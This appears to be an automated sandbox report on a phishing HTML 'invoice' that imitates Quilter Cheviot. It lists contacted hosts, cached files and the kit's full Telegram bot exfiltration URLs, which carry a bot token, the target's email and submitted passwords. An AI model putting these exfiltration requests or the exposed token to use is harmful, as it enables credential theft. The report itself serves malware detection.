                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.quiltercheviot.com/Content/images/v3/themes/qc/success.svgfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://dc.services.visualstudio.com/v2/trackfalse
                                                  		high
                                                  https://api.telegram.org/bot6800467599:AAGHIthuSv3CWGlzgsGIwx9GWQJ2OnFzEfE/sendMessage?chat_id=6522132099&text=%F0%9F%94%B9%20Second%20Password%20Attempt%20%F0%9F%94%B9%0A%0A%F0%9F%93%A7%20Email%3A%20charles.mesquita%40quiltercheviot.com%0A%F0%9F%94%91%20Password%201%3A%20hAhAhA%0A%F0%9F%94%91%20Password%202%3A%20RUBBISH%0A%F0%9F%8C%8D%20IP%3A%20161.77.13.20%0A%F0%9F%8F%B3%EF%B8%8F%20Country%3A%20US%0A%F0%9F%94%97%20Login%20URL%3A%20https%3A%2F%2Fmail.mxa-0036ff01.gslb.pphosted.comtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.htmltrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://quiltercheviot.com/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://cloud.typography.com/6419036/6235832/css/fonts.cssfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.quiltercheviot.com/4ad25c/globalassets/logos/qc-logos/qc-secondary-logo.svgfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.quiltercheviot.com/Util/Find/epi-util/find.jsfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.quiltercheviot.com/Content/Fonts/866831/B4C49007D12296CAC.cssfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.quiltercheviot.com/api/message/getall/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://ipinfo.io/jsonfalse
                                                    		high
                                                    https://www.quiltercheviot.com/4ad700/siteassets/imagery/hero-banners/customer-homepage-hero-banner.jpg?width=270&height=260&quality=20&rmode=crop&format=jpegfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://logo.clearbit.com/quiltercheviot.com?size=800false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://api.telegram.org/bot6800467599:AAGHIthuSv3CWGlzgsGIwx9GWQJ2OnFzEfE/sendMessage?chat_id=6522132099&text=%F0%9F%94%B9%20First%20Password%20Attempt%20%F0%9F%94%B9%0A%0A%F0%9F%93%A7%20Email%3A%20charles.mesquita%40quiltercheviot.com%0A%F0%9F%94%91%20Password%201%3A%20hAhAhA%0A%F0%9F%8C%8D%20IP%3A%20161.77.13.20%0A%F0%9F%8F%B3%EF%B8%8F%20Country%3A%20US%0A%F0%9F%94%97%20Login%20URL%3A%20https%3A%2F%2Fmail.mxa-0036ff01.gslb.pphosted.comtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.quiltercheviot.com/Content/images/v3/themes/qc/information.svgfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.quiltercheviot.com/api/rolesandregions/getroles/?pageLink=https%3A%2F%2Fwww.quiltercheviot.com%2Ffalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdnjs.cloudflare.com/ajax/libs/jsrender/1.0.6/jsrender.min.jsfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.quiltercheviot.com/4ad25c/globalassets/logos/qc-logos/qcfavicon512x512.pngfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.quiltercheviot.com/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.quiltercheviot.com/4ad700/siteassets/imagery/hero-banners/customer-homepage-hero-banner.jpg?width=539&height=520&quality=70&rmode=crop&format=jpegfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    13.107.246.40
                                                    		s-part-0012.t-0009.t-msedge.netUnited States
                                                    		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    8.8.4.4
                                                    		dns.googleUnited States
                                                    		15169GOOGLEUSfalse
                                                    142.251.40.227
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    142.251.40.168
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    142.250.64.110
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    142.250.64.99
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    142.250.64.78
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    142.250.81.238
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    8.8.8.8
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    149.154.167.220
                                                    		api.telegram.orgUnited Kingdom
                                                    		62041TELEGRAMRUfalse
                                                    142.251.40.232
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    173.222.103.192
                                                    		e7100.g.akamaiedge.netUnited States
                                                    		16625AKAMAI-ASUSfalse
                                                    142.251.40.195
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    104.22.38.92
                                                    		apikeys.civiccomputing.com.cdn.cloudflare.netUnited States
                                                    		13335CLOUDFLARENETUSfalse
                                                    142.250.65.234
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    142.251.35.174
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    142.250.65.170
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    1.1.1.1
                                                    		unknownAustralia
                                                    		13335CLOUDFLARENETUSfalse
                                                    108.138.106.63
                                                    		unknownUnited States
                                                    		16509AMAZON-02USfalse
                                                    172.217.14.68
                                                    		www.google.comUnited States
                                                    		15169GOOGLEUSfalse
                                                    34.117.59.81
                                                    		ipinfo.ioUnited States
                                                    		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                    217.114.85.70
                                                    		quiltercheviot.comSweden
                                                    		30811EPISERVER_ASSEfalse
                                                    108.138.106.26
                                                    		d26p066pn2w0s0.cloudfront.netUnited States
                                                    		16509AMAZON-02USfalse
                                                    172.67.8.54
                                                    		cc-cdn.civiccomputing.com.cdn.cloudflare.netUnited States
                                                    		13335CLOUDFLARENETUSfalse
                                                    52.188.247.147
                                                    		gig-ai-g-prod-eastus-6-app-v4-tag.eastus.cloudapp.azure.comUnited States
                                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    142.250.81.227
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    142.251.40.164
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    52.179.73.37
                                                    		gig-ai-g-prod-eastus-7-app-v4-tag.eastus.cloudapp.azure.comUnited States
                                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    172.64.152.25
                                                    		unknownUnited States
                                                    		13335CLOUDFLARENETUSfalse
                                                    104.18.35.231
                                                    		www.quiltercheviot.com.cdn.cloudflare.netUnited States
                                                    		13335CLOUDFLARENETUSfalse
                                                    104.17.25.14
                                                    		cdnjs.cloudflare.comUnited States
                                                    		13335CLOUDFLARENETUSfalse
                                                    142.251.163.84
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    104.22.39.92
                                                    		unknownUnited States
                                                    		13335CLOUDFLARENETUSfalse

                                                    Private

                                                    IP
                                                    192.168.2.16
                                                    192.168.2.6

                                                    General Information

                                                    Joe Sandbox version:42.0.0 Malachite
                                                    Analysis ID:1648028
                                                    Start date and time:2025-03-25 13:47:27 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:15
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • EGA enabled
                                                    Analysis Mode:stream
                                                    Analysis stop reason:Timeout
                                                    Sample name:Invoice_charles.mesquita_PaymentUpdate.html
                                                    Detection:MAL
                                                    Classification:mal84.phis.troj.winHTML@22/35@48/294
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .html
                                                    • Exclude process from analysis (whitelisted): svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 142.250.64.110, 142.250.81.227, 142.251.163.84
                                                    • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, clientservices.googleapis.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.html

                                                    Created / dropped Files

                                                    Chrome Cache Entry: 102

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:downloaded
                                                    Size (bytes):709
                                                    Entropy (8bit):5.21674145000545
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D56453CBCD80C8A34EB7C77F124947C4
                                                    SHA1:051E7E06B3522935F2455FF41A66691127F39C2E
                                                    SHA-256:744352E890EC6B71E88EC803A3A3976F27BD545D584454F8C32A04C6E37AC1ED
                                                    SHA-512:5FE11022E0BA838F3E852C1F594E0BFB0610BA9F9724D0E1F1069CCDE25003D281448EB1BAE495C4AD9C576F975E8E7BF9749461AE85259324E50997FF377785
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://api.telegram.org/bot6800467599:AAGHIthuSv3CWGlzgsGIwx9GWQJ2OnFzEfE/sendMessage?chat_id=6522132099&text=%F0%9F%94%B9%20First%20Password%20Attempt%20%F0%9F%94%B9%0A%0A%F0%9F%93%A7%20Email%3A%20charles.mesquita%40quiltercheviot.com%0A%F0%9F%94%91%20Password%201%3A%20hAhAhA%0A%F0%9F%8C%8D%20IP%3A%20161.77.13.20%0A%F0%9F%8F%B3%EF%B8%8F%20Country%3A%20US%0A%F0%9F%94%97%20Login%20URL%3A%20https%3A%2F%2Fmail.mxa-0036ff01.gslb.pphosted.com
                                                    Preview:{"ok":true,"result":{"message_id":632,"from":{"id":6800467599,"is_bot":true,"first_name":"US Unlimited","username":"usunlimitedbot"},"chat":{"id":6522132099,"first_name":"\"Olk","type":"private"},"date":1742906920,"text":"\ud83d\udd39 First Password Attempt \ud83d\udd39\n\n\ud83d\udce7 Email: charles.mesquita@quiltercheviot.com\n\ud83d\udd11 Password 1: hAhAhA\n\ud83c\udf0d IP: 161.77.13.20\n\ud83c\udff3\ufe0f Country: US\n\ud83d\udd17 Login URL: https://mail.mxa-0036ff01.gslb.pphosted.com","entities":[{"offset":40,"length":35,"type":"email"},{"offset":105,"length":12,"type":"url"},{"offset":148,"length":43,"type":"url"}],"link_preview_options":{"url":"https://mail.mxa-0036ff01.gslb.pphosted.com/"}}}

                                                    Chrome Cache Entry: 104

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:downloaded
                                                    Size (bytes):363
                                                    Entropy (8bit):4.951150844104779
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6F31661D79688ED2BF5CD163636F746F
                                                    SHA1:98CE809ECBCBEAFA6A24C37B6B197019B4A3C265
                                                    SHA-256:0A9D6B5229DA550F148AE62A686D38BE56277393005E2075980F28C9CE010F48
                                                    SHA-512:D0B9AFD7636F4EDFA83E523670DAED905D31D8C942D7E9E99C7F14575A1A8BA37832355DEEA29A842AF400414069B98E2192EB05E318FB5BDF14CF9D75D92974
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://dns.google/resolve?name=quiltercheviot.com&type=MX
                                                    Preview:{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"quiltercheviot.com.","type":15}],"Answer":[{"name":"quiltercheviot.com.","type":15,"TTL":300,"data":"10 mxa-0036ff01.gslb.pphosted.com."},{"name":"quiltercheviot.com.","type":15,"TTL":300,"data":"10 mxb-0036ff01.gslb.pphosted.com."}],"Comment":"Response from 156.154.131.100."}

                                                    Chrome Cache Entry: 105

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 539x520, components 3
                                                    Category:downloaded
                                                    Size (bytes):65679
                                                    Entropy (8bit):7.981690066948687
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:325E39DE3D6BBD07B2B94A19641A4940
                                                    SHA1:EDEF679732EAE5CA69C951D080543671F219CD27
                                                    SHA-256:10514061ED7D3693B1315C4D1F280B453B41DCCA3DB5090FC54B9F0B2D2F225C
                                                    SHA-512:ABE953AC3D3C02431F96CA6F0275930301D8EE685AF0598793BA7D8D1D880CD439E182D3DA4C0A92D8DDE36855A13BCD1093676F8F6C1C45E4D3B6E287809E6D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/4ad700/siteassets/imagery/hero-banners/customer-homepage-hero-banner.jpg?width=539&height=520&quality=70&rmode=crop&format=jpeg
                                                    Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}...........".....!....6...................................................................e..DM.....S.....-.....3.&.c.........Y*^0I.............;....................@...`..`..p.. ...xx...A8..x.$.,.|#.0.,y.....n.E...@.g.Dz..A.If.Cd...3...\x@(..... .& .r.......{..J`!0p..ww....... .$...............(..(../...!!.<.q...ZjdS.H...m.r...U...](..V...... .Q..TL`.G.J....(.........1P...D.j..^ .r..............`.(.....8x..D....q...-.>.G....W..&....-i_.z.[~ ).*`/.*.....@..uK.v/........Fk..J^....t.......H...8...Z..!.Jg).9.j. [..........D.w.$9I...JeU2j.~$'....m].....8.N.U1.v...B;..7.P...Z.x...Co.=.O...~....l9.>......E. .u...EY.$.N.h:..'<.4^..$...T.....E....#...>.;.^jee/.p.......*......a..b...._c6.....[.>..x.<./^wY./o...Q........}S..y.....O.&0?f........c....@WEio...}~r..K.....H......'..>I.........1ms..._nEh5I.+........4

                                                    Chrome Cache Entry: 107

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):29028
                                                    Entropy (8bit):3.8083675359871645
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:131B92812BEB10216EB5680BF0CB2682
                                                    SHA1:A8C0D68A26F425CC7EC19344D2E52BB9605295C0
                                                    SHA-256:C06C49EFB8AD27B17AAC7DD45E9DA908DD78CCD01D1F424AC0EB37442FB2968B
                                                    SHA-512:CD7702860F277DEE7616D9ADB648A876BD06EDFC4CE8B30D9EB731DEDA0559BD09164B0B6241282DEF291DD462ED382540DAA786575237285D8B52324A65F77B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/4ad25c/globalassets/logos/qc-logos/qc_primary_logo_stkdleft1_rgb72.svg
                                                    Preview:<svg width="245" height="79" viewBox="0 0 245 79" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_3711_7447)">.<g clip-path="url(#clip1_3711_7447)">.<path d="M135.877 31.1766C135.902 31.2596 135.896 31.3094 135.866 31.326C135.187 31.5252 134.517 31.622 133.855 31.622C132.581 31.622 131.266 31.2098 129.911 30.3827C128.554 29.5556 127.388 28.4076 126.413 26.9387H126.363C124.826 26.9387 123.455 26.5791 122.256 25.8599C121.057 25.1406 120.129 24.1669 119.478 22.9359C118.825 21.705 118.498 20.3633 118.498 18.9083C118.498 17.207 118.927 15.7492 119.789 14.5348C120.647 13.3205 121.752 12.4076 123.101 11.7963C124.45 11.1849 125.826 10.8806 127.233 10.8806C128.803 10.8806 130.185 11.2485 131.376 11.9844C132.567 12.7202 133.481 13.6911 134.118 14.8972C134.755 16.1033 135.074 17.3841 135.074 18.7395C135.074 20.474 134.556 22.0341 133.523 23.4228C132.49 24.8115 131.144 25.8018 129.49 26.3965C130.136 27.7852 130.966 28.9193 131.983 29.8046C132.999 30.687 133.971 31.1296 134

                                                    Chrome Cache Entry: 108

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):3011
                                                    Entropy (8bit):5.157932323020014
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4ECA5DD7BAE0EF637008C92E3C8C18E4
                                                    SHA1:C2E651B4E9BFB81597CF4FFFA8E25E7266B27CB0
                                                    SHA-256:5DDD48886518017D106975B744772B0BFB0191E8A4D63FDD33D233D8294B416F
                                                    SHA-512:766C83937D8550A4076F428C82D3DABF347A3A3C25A79C3FAE600D348AF84E3B3315CAA280E5B83BC0887439C7B09FE9A64E05164680D2D4EB563358FF860379
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:{"UserRoles":[{"RoleId":"pc","RoleName":"Private Client","Regions":[{"Id":"uk","RegionName":"United Kingdom","DisplayPrompt":false,"RegionUrl":"?Region=uk&Role=pc"},{"Id":"je","RegionName":"Jersey","DisplayPrompt":false,"RegionUrl":"?Region=je&Role=pc"},{"Id":"dub","RegionName":"Dubai","DisplayPrompt":false,"RegionUrl":"?Region=dub&Role=pc"},{"Id":"eur","RegionName":"Europe","DisplayPrompt":false,"RegionUrl":"?Region=eur&Role=pc"}]},{"RoleId":"fadv","RoleName":"Financial Adviser","Regions":[{"Id":"uk","RegionName":"United Kingdom","DisplayPrompt":false,"RegionUrl":"?Region=uk&Role=fadv"},{"Id":"je","RegionName":"Jersey","DisplayPrompt":false,"RegionUrl":"?Region=je&Role=fadv"},{"Id":"dub","RegionName":"Dubai","DisplayPrompt":false,"RegionUrl":"?Region=dub&Role=fadv"},{"Id":"eur","RegionName":"Europe","DisplayPrompt":false,"RegionUrl":"?Region=eur&Role=fadv"}]},{"RoleId":"char","RoleName":"Charity or professional trustee","Regions":[{"Id":"uk","RegionName":"United Kingdom","DisplayPromp

                                                    Chrome Cache Entry: 109

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):16926
                                                    Entropy (8bit):7.8943670233750565
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E6346E60EF82589B0BE4F4B5E8C12DDE
                                                    SHA1:05770DE24E7ED9F8660C68B756A7FA8962600105
                                                    SHA-256:3306E3ABB9C6B0723973502AEDA44A3130F7591F5B161612B40640BA2616154E
                                                    SHA-512:82D42CFFCA5AC73D32AEEE17738613BC1E771430B0B4F15AAAE79A3ED8C45A339DD4F294B7F92A7B4B299B46CBF2BF802043150B0151BE4F7DC79B2EFBA79BA7
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.PNG........IHDR..............x......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<..A.IDATx...n.t...1E&A1....p0&..E......qw.. ......2..j0........$0.14!)...bb#!...}..u.O...32Y..1..p..p.gq..p..X.$.>..e..5.....1..!|...1.i.9..w8..q...$....8.....07...]..a..}I........H^.v. ..EI.Yq..`.o..E...._.$.u+8....H..n..Sx$I.U=.....F.'|....$..`..xcdk.....$.......Z...X.$..=.q|42.......$y.....Ff..cI.$..4>..n..'..M.L.........'.$Y..8..F6...3.J.dc..0v.l<..UI.l.+.bdc`7....$Sb...u.opK.$..&...,..EI.L....M....'If.u|>.j.&~..$.A...S..ee.=...?kYk ...I......r..F...P".. d.(..J..R..w..(....}....?...vX.EI...X..:..CI.,......Z.$.....|.GZ.K.,.U......$I..Y.....qE.$...6.e..qM.$....}....$.r....2.v.$I....E..qW.$..}l....pS.$..;.w....*I.|.ul....{.K..]Z.N@..$I..1.p\.$....<.a.J.$?b...<....$I~.........O..y...,.:\.$I~...m.*..$I...1....$I......,.&<.$I..#.5f..K.$.pn....$I&i..&..$I2I.yL..I.$.pzL....M.djV.oL....I.d...1)8&I...c.../$I.Y..[.Z.YI......]..../......"V....X.B+.;...z...X..`.P.ll..f.X.^.

                                                    Chrome Cache Entry: 110

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 270x260, components 3
                                                    Category:downloaded
                                                    Size (bytes):19266
                                                    Entropy (8bit):7.973747930575571
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4D4C4CD117296033DEBF319EF5752DC2
                                                    SHA1:FCAEDCC388B2785815A9A154D5FABA0F7981DEBE
                                                    SHA-256:BA0535AE12BCCF776A9C9C5EC0CBCFB20B0CF997DACE5B35E4BD6D36A74B61B5
                                                    SHA-512:00EDB0237C5CD514E96F29684773DADBA5E3FBF71686B3BB28CF6D5BEB45326CB2AECE97D4950581EC171DC675D3E3234709DB5EC7DB8AF854765090D2FB20F8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/4ad700/siteassets/imagery/hero-banners/customer-homepage-hero-banner.jpg?width=270&height=260&quality=20&rmode=crop&format=jpeg
                                                    Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}...........".....!....5..................................................................&bd.^...Q..".|.:FH.l.J..uhJ..#..+<..V..L.W......%#..$.L.>/..6e...]....OhWgx.e>..oA.$..[Gr_.RjD..d...6%H..x.....%D.jd.......9......s.3.k.._...v...w....hQ.....paR._8.[P.).......9M.`.s.<...{..a_E.sc.......7..z:5.v.G.IU...h...sY7WYll.6tTRT]....1...`....*..#6.3.C.P...u*......I...^.o`.T)....Z...r...'.t.c4..-Ri@..fO..I..].d1m.....W.C^-......Jq+....3.....L.m.R.qa.j.UJte-..&7+//....e: ...e.. 1i.oPT=;.t.6 ......>k..n...BH.\.)).U....;.l.^1...|....8.$).f..<.i.\.z[ZZ-...kj..l.A.I.E..[...2.V...._.Z!.u......j.....%.1...n...Z.7ZTC:...nK.h.Zaj..\...:....*.I.\...N......D9.k.c*IX.^.}RC.\......t..W...\...ix.f.c.ux.......T|.R.*.........9.c.;+.....'../z...K....\.......7..\`5...W...HA%..b.Z..o....t.....$R....r.-...I].b.Z

                                                    Chrome Cache Entry: 111

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):28988
                                                    Entropy (8bit):3.8393499464288503
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CE8300E18DBB55F427CEADFC9650D926
                                                    SHA1:A531D9144FD15A183F2205949777D6D87807E89F
                                                    SHA-256:18517B8305CD6D6F59F99316B4B211D779AD197E0D5ABF6644A623E9BC43EF97
                                                    SHA-512:A84055E771CC4AA7EFC24FD8E9CE276F39441BC8B966731E35D8A8E36E9D9035CFADDFF357615302970ED9A93304A667F8C0E700B2B8E1FC86D1F2216D458F54
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/4ad25c/globalassets/logos/qc-logos/qc-secondary-logo.svg
                                                    Preview:<svg width="355" height="115" viewBox="0 0 355 115" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_4181_11952)">.<g clip-path="url(#clip1_4181_11952)">.<path d="M196.838 45.2179C196.874 45.3383 196.866 45.4105 196.822 45.4346C195.839 45.7234 194.868 45.8638 193.91 45.8638C192.064 45.8638 190.158 45.266 188.196 44.0664C186.23 42.8668 184.541 41.2018 183.129 39.0713H183.057C180.83 39.0713 178.844 38.5498 177.107 37.5066C175.37 36.4635 174.025 35.0512 173.083 33.2658C172.136 31.4804 171.662 29.5345 171.662 27.4242C171.662 24.9567 172.284 22.8423 173.532 21.081C174.776 19.3197 176.377 17.9957 178.331 17.109C180.284 16.2223 182.278 15.781 184.317 15.781C186.591 15.781 188.593 16.3146 190.319 17.3818C192.044 18.4491 193.368 19.8573 194.291 21.6066C195.213 23.3559 195.675 25.2135 195.675 27.1794C195.675 29.695 194.925 31.9579 193.428 33.9719C191.932 35.986 189.982 37.4224 187.586 38.285C188.521 40.299 189.725 41.944 191.197 43.2279C192.67 44.5078 194.078 45.1497 195.

                                                    Chrome Cache Entry: 112

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (815)
                                                    Category:downloaded
                                                    Size (bytes):3501
                                                    Entropy (8bit):5.383873370647921
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:147FD3B00C22BA9C939712E9213C24CA
                                                    SHA1:3B48369B86FA0574F35379AACD1F42CC9C98A52B
                                                    SHA-256:70F5B11C1870CF90201A6D5F770CA318A3FA5827C74A8765EDE22B487F7D4532
                                                    SHA-512:E8419A71232EDAC8FD131446777F7D034B3171EFE07B3267479B439E4982650DB65A0D1DDC9F516315D5ED1B01ECFD2F7EB55D75D44AA51EE0AD494D441586D2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.googletagmanager.com/static/service_worker/53k0/sw_iframe.html?origin=https%3A%2F%2Fwww.quiltercheviot.com
                                                    Preview:<!DOCTYPE html>.<html>.<head>. <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">.</head>.<body>. <script>.'use strict';class m{constructor(a){this.j=a;this.g={};this.h={};this.i=0;this.id=String(Math.floor(Number.MAX_SAFE_INTEGER*Math.random()))}}function n(a){return a.performance&&a.performance.now()||Date.now()}.var p=function(a,b){class d{constructor(c,g,f){this.failureType=c;this.data=g;this.g=f;this.h=new m(n(f))}s(c,g){const f=c.clientId;if(c.type===0){c.isDead=!0;var e=this.h,h=n(this.g);e.g[f]==null&&(e.g[f]=0,e.h[f]=h,e.i++);e.g[f]++;c.stats={targetId:e.id,clientCount:e.i,totalLifeMs:Math.round(h-e.j),heartbeatCount:e.g[f],clientLifeMs:Math.round(h-e.h[f])}}c.failure={failureType:this.failureType,data:this.data};g(c)}}return new d(5,a,b)};/*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/.let q=globalThis.trustedTypes,r;function t(){let a=null;if(!q)return a;try{const b=d=>d;a=q.createPolicy("goog#html",{createHTML:b,createScript:b,crea

                                                    Chrome Cache Entry: 113

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):16
                                                    Entropy (8bit):3.625
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E5288F1AD2850958B9D5E49037527724
                                                    SHA1:3347F513C60032F28B3299ED4B8D3081767FE2BB
                                                    SHA-256:0C7ED200DF9208B55041146A6668F0C16526A845AF7A65B727AC7E4FA3358007
                                                    SHA-512:95ED214F562953FE4ADFA65850A71B288E7A61F558379B7CF75E380461B42D1B28478BBFA62AED005A6D589108330CBD7C5ED0143452D70C683FD07280D8AA43
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCd_JJV8jseCfEgUNfoomCiEsrxsJoXPWhQ==?alt=proto
                                                    Preview:CgkKBw1+iiYKGgA=

                                                    Chrome Cache Entry: 114

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (3972), with CRLF, LF line terminators
                                                    Category:downloaded
                                                    Size (bytes):89057
                                                    Entropy (8bit):4.520818774780661
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:30221039B3A8597F647C1464FF8B26A5
                                                    SHA1:404D0E450BC0D705C48515194D4E82BAA87B519C
                                                    SHA-256:CF9916C5B5561D248C7FF2B18888DB7C25D0C90F2CEF3A73AA9D3364BC417530
                                                    SHA-512:AC63D81ACA797405D4CE289D5C2A6577B963CBD862239F9CA554F285BD6AB97A8042B2D83868A03E03F3B19FB2B74177F4D887403D617ABA8F4357E3B891E028
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/
                                                    Preview:...<!DOCTYPE html>..<html lang="en">.<head>. <meta charset="utf-8">. <meta http-equiv="x-ua-compatible" content="ie=edge">.. <title>Quilter Cheviot</title>.. <meta name="viewport" content="width=device-width, initial-scale=1">. <meta name="description" content="Quilter Cheviot have been helping clients to help grow and preserve their wealth for over 250 years. Discover more about who we are and the services we offer." />. <meta name="robots" content="INDEX, FOLLOW" />. Open graph -->. <meta property="og:title" content="Quilter Cheviot">. <meta property="og:type" content="website">. <meta property="og:description" content="Quilter Cheviot have been helping clients to help grow and preserve their wealth for over 250 years. Discover more about who we are and the services we offer.">. <meta property="og:site_name" content="www.quiltercheviot.com">. <meta property="og:locale" content="en-US">.... <meta property="fb:app_id" content="18515031650

                                                    Chrome Cache Entry: 115

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):200
                                                    Entropy (8bit):5.0207274619676845
